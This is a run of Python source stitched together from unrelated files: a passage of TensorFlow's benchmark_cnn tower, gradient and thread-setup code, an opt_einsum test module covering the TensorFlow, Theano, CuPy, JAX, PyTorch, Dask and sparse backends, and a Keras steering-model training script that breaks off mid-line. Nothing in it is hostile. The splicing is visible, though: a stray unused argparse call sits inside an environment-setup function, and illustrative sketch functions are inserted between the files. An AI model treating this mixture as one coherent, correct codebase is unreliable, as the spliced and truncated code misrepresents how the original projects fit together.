self.reset_devices_for_task(task_num, is_local) # Build the per-worker image processing with tf.name_scope('input_processing'): input_processing_info = self._build_input_processing( shift_ratio=(task_num / self.num_workers)) if input_processing_info.input_producer_op is not None: global_input_producer_op.extend(input_processing_info.input_producer_op) # Build the per-worker model replica. for rel_device_num in range(len(self.devices)): abs_device_num = task_num * len(self.devices) + rel_device_num with self.variable_mgr.create_outer_variable_scope( abs_device_num), tf.name_scope( 'task_%i_tower_%i' % (task_num, rel_device_num)) as name_scope: task_results = self.add_forward_pass_and_gradients( phase_train, rel_device_num, abs_device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops) if self.params.backbone_model_path: self.model.add_backbone_saver() if phase_train: losses.append(task_results['loss']) device_grads.append(task_results['gradvars']) else: all_logits.append(task_results['logits']) if not phase_train or self.params.print_training_accuracy: for name, op in task_results.items(): if name.startswith('accuracy:'): key = name[9:] if key not in all_accuracy_ops: all_accuracy_ops[key] = [] all_accuracy_ops[key].append(op) if rel_device_num == 0: # Retain the Batch Normalization updates operations only # from the first tower. These operations update the moving # mean and moving variance variables, which are updated # (but not used) during training, and used during # evaluation. The moving mean and variance approximate the # true mean and variance across all images in the # dataset. Therefore, in replicated mode, these moving # averages would be almost identical for each tower, and # so we only update and save the moving averages for one # tower. In parameter server mode, all towers share a copy # of the variables so we also only need to update and save # the moving averages once. update_ops.extend( tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope)) assert not self.variable_mgr.staging_delta_ops enqueue_ops = [] if gpu_compute_stage_ops: enqueue_ops.append(tf.group(*gpu_compute_stage_ops, name='gpu_compute_stage_ops')) assert not self.variable_mgr.supports_staged_vars() assert not gpu_grad_stage_ops fetches = self._build_fetches(global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train) if global_input_producer_op: global_input_producer_op = tf.group(*global_input_producer_op) else: global_input_producer_op = None return (global_input_producer_op, enqueue_ops, fetches) def add_forward_pass_and_gradients(self, phase_train, rel_device_num, abs_device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops): """Add ops for forward-pass and gradient computations.""" nclass = self.dataset.num_classes if self.datasets_use_prefetch: function_buffering_resource = None if input_processing_info.function_buffering_resources: function_buffering_resource = ( input_processing_info.function_buffering_resources[rel_device_num]) input_data = None if input_processing_info.multi_device_iterator_input: input_data = ( input_processing_info.multi_device_iterator_input[rel_device_num]) # Exactly one of function_buffering_resource or input_data is not None. 
if function_buffering_resource is None and input_data is None: raise ValueError('Both function_buffering_resource and input_data ' 'cannot be null if datasets_use_prefetch=True') if function_buffering_resource is not None and input_data is not None: raise ValueError('Both function_buffering_resource and input_data ' 'cannot be specified. Only one should be.') with tf.device(self.raw_devices[rel_device_num]): if function_buffering_resource is not None: subset = 'validation' if self._doing_eval else 'train' input_list = prefetching_ops.function_buffering_resource_get_next( function_buffering_resource, output_types=self.model.get_input_data_types(subset)) else: input_list = input_data else: if not self.dataset.use_synthetic_gpu_inputs(): input_producer_stage = input_processing_info.input_producer_stages[ rel_device_num] with tf.device(self.cpu_device): host_input_list = input_producer_stage.get() with tf.device(self.raw_devices[rel_device_num]): gpu_compute_stage = data_flow_ops.StagingArea( [inp.dtype for inp in host_input_list], shapes=[inp.get_shape() for inp in host_input_list]) # The CPU-to-GPU copy is triggered here. gpu_compute_stage_op = gpu_compute_stage.put(host_input_list) input_list = gpu_compute_stage.get() gpu_compute_stage_ops.append(gpu_compute_stage_op) else: with tf.device(self.raw_devices[rel_device_num]): # Minor hack to avoid H2D copy when using synthetic data input_list = self.model.get_synthetic_inputs( BenchmarkCNN.GPU_CACHED_INPUT_VARIABLE_NAME, nclass) # Labels reshaping happens all on gpu:0. Reshaping synthetic labels on # multiple devices slows down XLA computation for an unknown reason. # TODO(b/116875203): Find/address root cause of XLA slow down. labels_device_placement_hack = ( self.dataset.use_synthetic_gpu_inputs() and self.params.xla_compile) def device_aware_reshape(tensor, shape): device = self.devices[rel_device_num] # Labels are int32, place reshapes on gpu:0 (no device placement) when the # hack is enabled. if labels_device_placement_hack and tensor.dtype == tf.int32: device = '' with tf.device(device): return tf.reshape(tensor, shape=shape) subset = 'validation' if self._doing_eval else 'train' input_shapes = self.model.get_input_shapes(subset) input_list = [ device_aware_reshape(input_list[i], shape=input_shapes[i]) for i in range(len(input_list)) ] def forward_pass_and_gradients(): """Builds forward pass and gradient computation network. When phase_train=True and print_training_accuracy=False: return [loss] + grads When phase_train=True and print_training_accuracy=True: return [logits, loss] + grads When phase_train=False, return [logits] Its output can always be unpacked by ``` outputs = forward_pass_and_gradients() logits, loss, grads = unpack_forward_pass_and_gradients_output(outputs) ``` Returns: outputs: A list of tensors depending on different modes. """ build_network_result = self.model.build_network( input_list, phase_train, nclass) logits = build_network_result.logits if not phase_train: return [logits] base_loss = self.model.loss_function(input_list, build_network_result) params = self.variable_mgr.trainable_variables_on_device( rel_device_num, abs_device_num) l2_loss = None total_loss = base_loss with tf.name_scope('l2_loss'): fp32_params = params if self.model.data_type == tf.float16 and self.params.fp16_vars: # fp16 reductions are very slow on GPUs, so cast to fp32 before # calling tf.nn.l2_loss and tf.add_n. # TODO(b/36217816): Once the bug is fixed, investigate if we should do # this reduction in fp16. 
fp32_params = (tf.cast(p, tf.float32) for p in params) filtered_params = self.model.filter_l2_loss_vars(fp32_params) if rel_device_num == len(self.devices) - 1: # We compute the L2 loss for only one device instead of all of them, # because the L2 loss for each device is the same. To adjust for this, # we multiply the L2 loss by the number of devices. We choose the # last device because for some reason, on a Volta DGX1, the first four # GPUs take slightly longer to complete a step than the last four. # TODO(reedwm): Shard the L2 loss computations across GPUs. if self.params.single_l2_loss_op: # TODO(reedwm): If faster, create a fused op that does the L2 loss # on multiple tensors, and use that instead of concatenating # tensors. reshaped_params = [tf.reshape(p, (-1,)) for p in filtered_params] l2_loss = tf.nn.l2_loss(tf.concat(reshaped_params, axis=0)) else: l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in filtered_params]) weight_decay = self.params.weight_decay mlperf.logger.log(key=mlperf.tags.OPT_WEIGHT_DECAY, value=weight_decay) if (weight_decay is not None and weight_decay != 0. and l2_loss is not None): mlperf.logger.log(key=mlperf.tags.MODEL_L2_REGULARIZATION, value=weight_decay) total_loss += len(self.devices) * weight_decay * l2_loss aggmeth = tf.AggregationMethod.DEFAULT scaled_loss = (total_loss if self.loss_scale is None else total_loss * self.loss_scale) grads = tf.gradients(scaled_loss, params, aggregation_method=aggmeth) if self.params.sparse_to_dense_grads: # Passing a sparse gradient to convert_to_tensor turns it into a dense # gradient. A sparse gradient is an instance of tf.IndexedSlices. # convert_to_tensor does not modify dense tensors. grads = [tf.convert_to_tensor(g) for g in grads] if self.loss_scale is not None: # TODO(reedwm): If automatic loss scaling is not used, we could avoid # these multiplications by directly modifying the learning rate instead. # If this is done, care must be taken to ensure that this scaling method # is correct, as some optimizers square gradients and do other # operations which might not be compatible with modifying both the # gradients and the learning rate. grads = [ grad * tf.cast(1. / self.loss_scale, grad.dtype) for grad in grads ] if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top if self.params.horovod_device: horovod_device = '/%s:0' % self.params.horovod_device else: horovod_device = '' # All-reduce gradients using Horovod. grads = [hvd.allreduce(grad, average=False, device_dense=horovod_device) for grad in grads] if self.params.staged_vars: grad_dtypes = [grad.dtype for grad in grads] grad_shapes = [grad.shape for grad in grads] grad_stage = data_flow_ops.StagingArea(grad_dtypes, grad_shapes) grad_stage_op = grad_stage.put(grads) # In general, this decouples the computation of the gradients and # the updates of the weights. # During the pipeline warm up, this runs enough training to produce # the first set of gradients. gpu_grad_stage_ops.append(grad_stage_op) grads = grad_stage.get() if self.params.loss_type_to_report == 'total_loss': loss = total_loss else: loss = base_loss if self.params.print_training_accuracy: return [logits, loss] + grads else: return [loss] + grads def unpack_forward_pass_and_gradients_output(forward_pass_and_grad_outputs): """Unpacks outputs from forward_pass_and_gradients. Args: forward_pass_and_grad_outputs: Output from forward_pass_and_gradients. Returns: logits: Unscaled probability distribution from forward pass. 
If unavailable, None is returned. loss: Loss function result from logits. If unavailable, None is returned. grads: Gradients for all trainable variables. If unavailable, None is returned. """ logits = None # logits is only fetched in non-train mode or when # print_training_accuracy is set. if not phase_train or self.params.print_training_accuracy: logits = forward_pass_and_grad_outputs.pop(0) loss = ( forward_pass_and_grad_outputs[0] if forward_pass_and_grad_outputs else None) grads = ( forward_pass_and_grad_outputs[1:] if forward_pass_and_grad_outputs else None) return logits, loss, grads def make_results(logits, loss, grads): """Generate results based on logits, loss and grads.""" results = {} # The return value if logits is not None: results['logits'] = logits accuracy_ops = self.model.accuracy_function(input_list, logits) for name, op in accuracy_ops.items(): results['accuracy:' + name] = op if loss is not None: results['loss'] = loss if grads is not None: param_refs = self.variable_mgr.trainable_variables_on_device( rel_device_num, abs_device_num, writable=True) results['gradvars'] = list(zip(grads, param_refs)) return results with tf.device(self.devices[rel_device_num]): outputs = maybe_compile(forward_pass_and_gradients, self.params) logits, loss, grads = unpack_forward_pass_and_gradients_output(outputs) return make_results(logits, loss, grads) def get_input_preprocessor(self): """Returns the image preprocessor to used, based on the model. Returns: The image preprocessor, or None if synthetic data should be used. """ shift_ratio = 0 if self.job_name: # shift_ratio prevents multiple workers from processing the same batch # during a step shift_ratio = self.task_index / self.num_workers processor_class = self.dataset.get_input_preprocessor( self.params.input_preprocessor) assert processor_class subset = 'validation' if self._doing_eval else 'train' return processor_class( self.batch_size * self.batch_group_size, self.model.get_input_shapes(subset), len(self.devices) * self.batch_group_size, dtype=self.model.data_type, train=(not self._doing_eval), # TODO(laigd): refactor away image model specific parameters. distortions=self.params.distortions, resize_method=self.resize_method, shift_ratio=shift_ratio, summary_verbosity=self.params.summary_verbosity, distort_color_in_yiq=self.params.distort_color_in_yiq, fuse_decode_and_crop=self.params.fuse_decode_and_crop, match_mlperf=self.params.ml_perf) def add_sync_queues_and_barrier(self, name_prefix, enqueue_after_list): """Adds ops to enqueue on all worker queues. Args: name_prefix: prefixed for the shared_name of ops. enqueue_after_list: control dependency from ops. Returns: An op that should be used as control dependency before starting next step. """ self.sync_queue_counter += 1 with tf.device(self.sync_queue_devices[( self.sync_queue_counter % len(self.sync_queue_devices))]): sync_queues = [ tf.FIFOQueue(self.num_workers, [tf.bool], shapes=[[]], shared_name='%s%s' % (name_prefix, i)) for i in range(self.num_workers)] queue_ops = [] # For each other worker, add an entry in a queue, signaling that it can # finish this step. token = tf.constant(False) with tf.control_dependencies(enqueue_after_list): for i, q in enumerate(sync_queues): if i == self.task_index: queue_ops.append(tf.no_op()) else: queue_ops.append(q.enqueue(token)) # Drain tokens off queue for this worker, one for each other worker. 
queue_ops.append( sync_queues[self.task_index].dequeue_many(len(sync_queues) - 1)) return tf.group(*queue_ops) def _is_mkl_flag_absent(mkl_flag): return not (absl_flags.FLAGS.is_parsed() and mkl_flag in absl_flags.FLAGS and absl_flags.FLAGS[mkl_flag].present) def _print_os_env_ignored_warning(mkl_flag, flag_default_val, os_env_var): tf.logging.warn( ('OS ENV variable %s=%s is ignored and script default: ' '%s is used. Use --%s to override.') % (os_env_var, os.environ[os_env_var], flag_default_val, mkl_flag)) def _set_environ_vars(params): """Sets up the environment variables that BenchmarkCNN should use.""" if params.batchnorm_persistent: os.environ['TF_USE_CUDNN_BATCHNORM_SPATIAL_PERSISTENT'] = '1' else: os.environ.pop('TF_USE_CUDNN_BATCHNORM_SPATIAL_PERSISTENT', None) if params.winograd_nonfused: os.environ['TF_ENABLE_WINOGRAD_NONFUSED'] = '1' else: os.environ.pop('TF_ENABLE_WINOGRAD_NONFUSED', None) if params.autotune_threshold: os.environ['TF_AUTOTUNE_THRESHOLD'] = str(params.autotune_threshold) os.environ['TF_SYNC_ON_FINISH'] = str(int(params.sync_on_finish)) argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter) # Sets environment variables for MKL # If OS ENV vars are overridden by script defaults, a warning msg is printed. if params.mkl: mkl_flags = ['kmp_blocktime', 'kmp_settings', 'kmp_affinity', 'num_intra_threads'] for mkl_flag in mkl_flags: os_env_var = mkl_flag.upper() if mkl_flag == 'num_intra_threads': os_env_var = 'OMP_NUM_THREADS' flag_val = str(getattr(params, mkl_flag)) if _is_mkl_flag_absent(mkl_flag) and os_env_var in os.environ: _print_os_env_ignored_warning(mkl_flag, flag_val, os_env_var) os.environ[os_env_var] = flag_val if mkl_flag == 'num_intra_threads' and not params.num_intra_threads: os.environ.pop(os_env_var, None) # Sets GPU thread settings if params.device.lower() == 'gpu': params = params._replace(gpu_thread_mode=params.gpu_thread_mode.lower()) if params.gpu_thread_mode not in ['global', 'gpu_shared', 'gpu_private']: raise ValueError('Invalid gpu_thread_mode: %s' % params.gpu_thread_mode) os.environ['TF_GPU_THREAD_MODE'] = params.gpu_thread_mode if params.per_gpu_thread_count and params.gpu_thread_mode == 'global': raise ValueError( 'Invalid per_gpu_thread_count with gpu_thread_mode=global: %s' % params.per_gpu_thread_count) # Default to two threads. One for the device compute and the other for # memory copies. 
per_gpu_thread_count = params.per_gpu_thread_count or 2 total_gpu_thread_count = per_gpu_thread_count * params.num_gpus if params.gpu_thread_mode == 'gpu_private': os.environ['TF_GPU_THREAD_COUNT'] = str(per_gpu_thread_count) elif params.gpu_thread_mode == 'gpu_shared': os.environ['TF_GPU_THREAD_COUNT'] = str(total_gpu_thread_count) cpu_count = multiprocessing.cpu_count() if not params.num_inter_threads and params.gpu_thread_mode in [ 'gpu_private', 'gpu_shared' ]: main_thread_count = max(cpu_count - total_gpu_thread_count, 1) params = params._replace(num_inter_threads=main_thread_count) if (params.datasets_use_prefetch and params.datasets_num_private_threads is None): # From the total cpu thread count, subtract the total_gpu_thread_count, # and then 2 threads per GPU device for event monitoring and sending / # receiving tensors num_monitoring_threads = 2 * params.num_gpus num_private_threads = max( cpu_count - total_gpu_thread_count - num_monitoring_threads, 1) params = params._replace(datasets_num_private_threads=num_private_threads) return params def setup(params): """Sets up the environment that BenchmarkCNN should run in. Args: params: Params tuple, typically created by make_params or make_params_from_flags. Returns: A potentially modified params. Raises: ValueError: invalid parames combinations. """ # Set up environment variables before doing any other global initialization to # make sure it uses the appropriate environment variables. params = _set_environ_vars(params) # horovod needs to be initialized before create_config_proto() call since # it will be used in config generation if enabled. if params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top hvd.init() platforms_util.initialize(params, create_config_proto(params)) if not params.job_name: # Create a dummy session to initialize TF global variables using the input # params. Otherwise, ListDevices function may create global devices using # the default config instead of using the user provided config. # # TODO(hinsu): Find a way to achieve the same for distributed benchmark. It # is not legal to create distributed session after local session. It is also # not possible to create distributed session here as that results in # multiple creation of ClusterManager and Server. with tf.Session(config=create_config_proto(params)) as sess: del sess return params def maybe_compile(computation, params): if params and params.xla_compile: return xla.compile(computation) else: return computation()
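# A minimal, hypothetical sketch (not part of benchmark_cnn.py) of the thread
# budgeting performed by _set_environ_vars() above: each GPU gets two threads by
# default (one for device compute, one for memory copies), and the remaining CPU
# threads are split between the inter-op pool and private dataset threads. The
# name plan_thread_counts and the returned dict are illustrative assumptions.
def plan_thread_counts(num_gpus, cpu_count, per_gpu_thread_count=None):
  per_gpu = per_gpu_thread_count or 2          # compute thread + memcpy thread
  total_gpu = per_gpu * num_gpus
  num_monitoring = 2 * num_gpus                # event monitoring + send/receive
  num_inter = max(cpu_count - total_gpu, 1)    # inter-op thread pool
  num_private = max(cpu_count - total_gpu - num_monitoring, 1)  # dataset threads
  return {'per_gpu': per_gpu,
          'inter_op': num_inter,
          'datasets_private': num_private}

# Example: 8 GPUs on a 96-core host -> 16 GPU threads, 80 inter-op threads and
# 64 private dataset threads.
# print(plan_thread_counts(num_gpus=8, cpu_count=96))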
import numpy as np import pytest from opt_einsum import (backends, contract, contract_expression, helpers, sharing) from opt_einsum.contract import Shaped, infer_backend, parse_backend try: import cupy found_cupy = True except ImportError: found_cupy = False try: import tensorflow as tf # needed so tensorflow doesn't allocate all gpu mem _TF_CONFIG = tf.ConfigProto() _TF_CONFIG.gpu_options.allow_growth = True found_tensorflow = True except ImportError: found_tensorflow = False try: import os os.environ['MKL_THREADING_LAYER'] = 'GNU' import theano found_theano = True except ImportError: found_theano = False try: import torch found_torch = True except ImportError: found_torch = False try: import jax found_jax = True except ImportError: found_jax = False try: import autograd found_autograd = True except ImportError: found_autograd = False tests = [ 'ab,bc->ca', 'abc,bcd,dea', 'abc,def->fedcba', 'abc,bcd,df->fa', # test 'prefer einsum' ops 'ijk,ikj', 'i,j->ij', 'ijk,k->ij', 'AB,BC->CA', ] @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("string", tests) def test_tensorflow(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) opt = np.empty_like(ein) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) sess = tf.Session(config=_TF_CONFIG) with sess.as_default(): expr(*views, backend='tensorflow', out=opt) sess.close() assert np.allclose(ein, opt) # test non-conversion mode tensorflow_views = [backends.to_tensorflow(view) for view in views] expr(*tensorflow_views) @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_tensorflow_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check tensorflow with tf.Session(config=_TF_CONFIG).as_default(): res_got = expr(var, backend='tensorflow') assert all(array is None or infer_backend(array) == 'tensorflow' for array in expr._evaluated_constants['tensorflow']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check tensorflow call returns tensorflow still res_got3 = expr(backends.to_tensorflow(var)) assert isinstance(res_got3, tf.Tensor) @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("string", tests) def test_tensorflow_with_sharing(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) sess = tf.Session(config=_TF_CONFIG) with sess.as_default(), sharing.shared_intermediates() as cache: tfl1 = expr(*views, backend='tensorflow') assert sharing.get_sharing_cache() is cache cache_sz = len(cache) assert cache_sz > 0 tfl2 = expr(*views, backend='tensorflow') assert len(cache) == cache_sz assert all(isinstance(t, tf.Tensor) for t in cache.values()) assert np.allclose(ein, tfl1) assert np.allclose(ein, tfl2) @pytest.mark.skipif(not found_theano, reason="Theano not installed.") 
@pytest.mark.parametrize("string", tests) def test_theano(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='theano') assert np.allclose(ein, opt) # test non-conversion mode theano_views = [backends.to_theano(view) for view in views] theano_opt = expr(*theano_views) assert isinstance(theano_opt, theano.tensor.TensorVariable) @pytest.mark.skipif(not found_theano, reason="theano not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_theano_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check theano res_got = expr(var, backend='theano') assert all(array is None or infer_backend(array) == 'theano' for array in expr._evaluated_constants['theano']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check theano call returns theano still res_got3 = expr(backends.to_theano(var)) assert isinstance(res_got3, theano.tensor.TensorVariable) @pytest.mark.skipif(not found_theano, reason="Theano not installed.") @pytest.mark.parametrize("string", tests) def test_theano_with_sharing(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) with sharing.shared_intermediates() as cache: thn1 = expr(*views, backend='theano') assert sharing.get_sharing_cache() is cache cache_sz = len(cache) assert cache_sz > 0 thn2 = expr(*views, backend='theano') assert len(cache) == cache_sz assert all(isinstance(t, theano.tensor.TensorVariable) for t in cache.values()) assert np.allclose(ein, thn1) assert np.allclose(ein, thn2) @pytest.mark.skipif(not found_cupy, reason="Cupy not installed.") @pytest.mark.parametrize("string", tests) def test_cupy(string): # pragma: no cover views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='cupy') assert np.allclose(ein, opt) # test non-conversion mode cupy_views = [backends.to_cupy(view) for view in views] cupy_opt = expr(*cupy_views) assert isinstance(cupy_opt, cupy.ndarray) assert np.allclose(ein, cupy.asnumpy(cupy_opt)) @pytest.mark.skipif(not found_cupy, reason="Cupy not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_cupy_with_constants(constants): # pragma: no cover eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check cupy res_got = expr(var, backend='cupy') # check cupy versions of constants exist assert all(array is None or infer_backend(array) == 'cupy' for array in expr._evaluated_constants['cupy']) assert 
np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check cupy call returns cupy still res_got3 = expr(cupy.asarray(var)) assert isinstance(res_got3, cupy.ndarray) assert np.allclose(res_exp, res_got3.get()) @pytest.mark.skipif(not found_jax, reason="jax not installed.") @pytest.mark.parametrize("string", tests) def test_jax(string): # pragma: no cover views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='jax') assert np.allclose(ein, opt) assert isinstance(opt, np.ndarray) @pytest.mark.skipif(not found_jax, reason="jax not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_jax_with_constants(constants): # pragma: no cover eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check jax res_got = expr(var, backend='jax') # check jax versions of constants exist assert all(array is None or infer_backend(array) == 'jax' for array in expr._evaluated_constants['jax']) assert np.allclose(res_exp, res_got) @pytest.mark.skipif(not found_jax, reason="jax not installed.") def test_jax_jit_gradient(): eq = 'ij,jk,kl->' shapes = (2, 3), (3, 4), (4, 2) views = [np.random.randn(*s) for s in shapes] expr = contract_expression(eq, *shapes) x0 = expr(*views) jit_expr = jax.jit(expr) x1 = jit_expr(*views).item() assert x1 == pytest.approx(x0, rel=1e-5) # jax only takes gradient w.r.t first argument grad_expr = jax.jit(jax.grad(lambda views: expr(*views))) view_grads = grad_expr(views) assert all(v1.shape == v2.shape for v1, v2 in zip(views, view_grads)) # taking a step along the gradient should reduce our 'loss' new_views = [v - 0.001 * dv for v, dv in zip(views, view_grads)] x2 = jit_expr(*new_views).item() assert x2 < x1 @pytest.mark.skipif(not found_autograd, reason="autograd not installed.") def test_autograd_gradient(): eq = 'ij,jk,kl->' shapes = (2, 3), (3, 4), (4, 2) views = [np.random.randn(*s) for s in shapes] expr = contract_expression(eq, *shapes) x0 = expr(*views) # autograd only takes gradient w.r.t first argument grad_expr = autograd.grad(lambda views: expr(*views)) view_grads = grad_expr(views) assert all(v1.shape == v2.shape for v1, v2 in zip(views, view_grads)) # taking a step along the gradient should reduce our 'loss' new_views = [v - 0.001 * dv for v, dv in zip(views, view_grads)] x1 = expr(*new_views) assert x1 < x0 @pytest.mark.parametrize("string", tests) def test_dask(string): da = pytest.importorskip("dask.array") views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) # test non-conversion mode da_views = [da.from_array(x, chunks=(2)) for x in views] da_opt = expr(*da_views) # check type is maintained when not using numpy arrays assert isinstance(da_opt, da.Array) assert np.allclose(ein, np.array(da_opt)) # try raw contract da_opt = contract(string, *da_views) assert isinstance(da_opt, da.Array) assert np.allclose(ein, np.array(da_opt)) @pytest.mark.parametrize("string", 
tests) def test_sparse(string): sparse = pytest.importorskip("sparse") views = helpers.build_views(string) # sparsify views so they don't become dense during contraction for view in views: np.random.seed(42) mask = np.random.choice([False, True], view.shape, True, [0.05, 0.95]) view[mask] = 0 ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) # test non-conversion mode sparse_views = [sparse.COO.from_numpy(x) for x in views] sparse_opt = expr(*sparse_views) # check type is maintained when not using numpy arrays assert isinstance(sparse_opt, sparse.COO) assert np.allclose(ein, sparse_opt.todense()) # try raw contract sparse_opt = contract(string, *sparse_views) assert isinstance(sparse_opt, sparse.COO) assert np.allclose(ein, sparse_opt.todense()) @pytest.mark.skipif(not found_torch, reason="Torch not installed.") @pytest.mark.parametrize("string", tests) def test_torch(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='torch') assert np.allclose(ein, opt) # test non-conversion mode torch_views = [backends.to_torch(view) for view in views] torch_opt = expr(*torch_views) assert isinstance(torch_opt, torch.Tensor) assert np.allclose(ein, torch_opt.cpu().numpy()) @pytest.mark.skipif(not found_torch, reason="Torch not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_torch_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check torch res_got = expr(var, backend='torch') assert all(array is None or infer_backend(array) == 'torch' for array in expr._evaluated_constants['torch']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check torch call returns torch still res_got3 = expr(backends.to_torch(var)) assert isinstance(res_got3, torch.Tensor) res_got3 = res_got3.numpy() if res_got3.device.type == 'cpu' else res_got3.cpu().numpy() assert np.allclose(res_exp, res_got3) def test_auto_backend_custom_array_no_tensordot(): x = Shaped((1, 2, 3)) # Shaped is an array-like object defined by opt_einsum - which has no TDOT assert infer_backend(x) == 'opt_einsum' assert parse_backend([x], 'auto') == 'numpy'
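# A minimal, hypothetical usage sketch (not one of the tests above) of the
# pattern these backend tests exercise: build a reusable contract_expression
# from shapes once, evaluate it with concrete arrays, and optionally bake some
# operands in as constants. It reuses the numpy and opt_einsum imports at the
# top of this module and sticks to the numpy backend, so it runs without any
# of the optional GPU/graph libraries.
def _example_reusable_expression():
    eq = 'ij,jk,kl->li'
    shapes = [(2, 3), (3, 4), (4, 5)]
    arrays = [np.random.rand(*s) for s in shapes]

    expr = contract_expression(eq, *shapes, optimize=True)
    out = expr(*arrays)  # same result as contract(eq, *arrays)
    assert np.allclose(out, contract(eq, *arrays))

    # Bake the first two operands in as constants; the expression then only
    # needs the remaining operand at call time.
    const_expr = contract_expression(eq, arrays[0], arrays[1], shapes[2],
                                     constants={0, 1})
    assert np.allclose(const_expr(arrays[2]), out)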
import csv from training import constants import numpy as np import cv2 from keras.models import Model, Sequential from keras.layers import Dense, Flatten, Conv2D, Lambda, Cropping2D, MaxPool2D, Dropout from keras.callbacks import EarlyStopping def read_training_data(file, mirror_input=True, multicam=True): images = [] steering_angles = [] with open(file) as csvfile: csvreader = csv.reader(csvfile, delimiter=',') for row in csvreader: row_images = [] row_steering_angles = [] # create adjusted steering measurements for the side camera images steer_correction = 0.2 # this is a parameter to tune row_images.append(cv2.imread(row[constants.IMAGE_CENTER])) row_steering_angles.append(float(row[constants.STEERING_ANGLE])) if multicam: row_images.append(cv2.imread(row[constants.IMAGE_LEFT])) row_images.append(cv2.imread(row[constants.IMAGE_RIGHT])) row_steering_angles.append( float(row[constants.STEERING_ANGLE]) + steer_correction) row_steering_angles.append( float(row[constants.STEERING_ANGLE]) - steer_correction) if mirror_input: mirrored_row_images, mirrored_row_steering_angles = mirror( row_images, row_steering_angles) row_images.extend(mirrored_row_images) row_steering_angles.extend(mirrored_row_steering_angles) images.extend(row_images) steering_angles.extend(row_steering_angles) return np.array(images), np.array(steering_angles) def mirror(images, steering_angles): return list(map(lambda image: cv2.flip(image, 1), images)), list(map(lambda angle: -angle, steering_angles)) def crop(image, top=64, bottom=20, left=0, right=0): height = image.shape[0] width = image.shape[1] return image[top:(height - bottom), left:(width - right)] def train(X_train, y_train, keep_prob=0.8): dropout_rate = 1.0 - keep_prob model = Sequential() model.add(Cropping2D(((40, 20), (0, 0)), input_shape=(160, 320, 3))) model.add(Lambda(lambda x: (x - 128) / 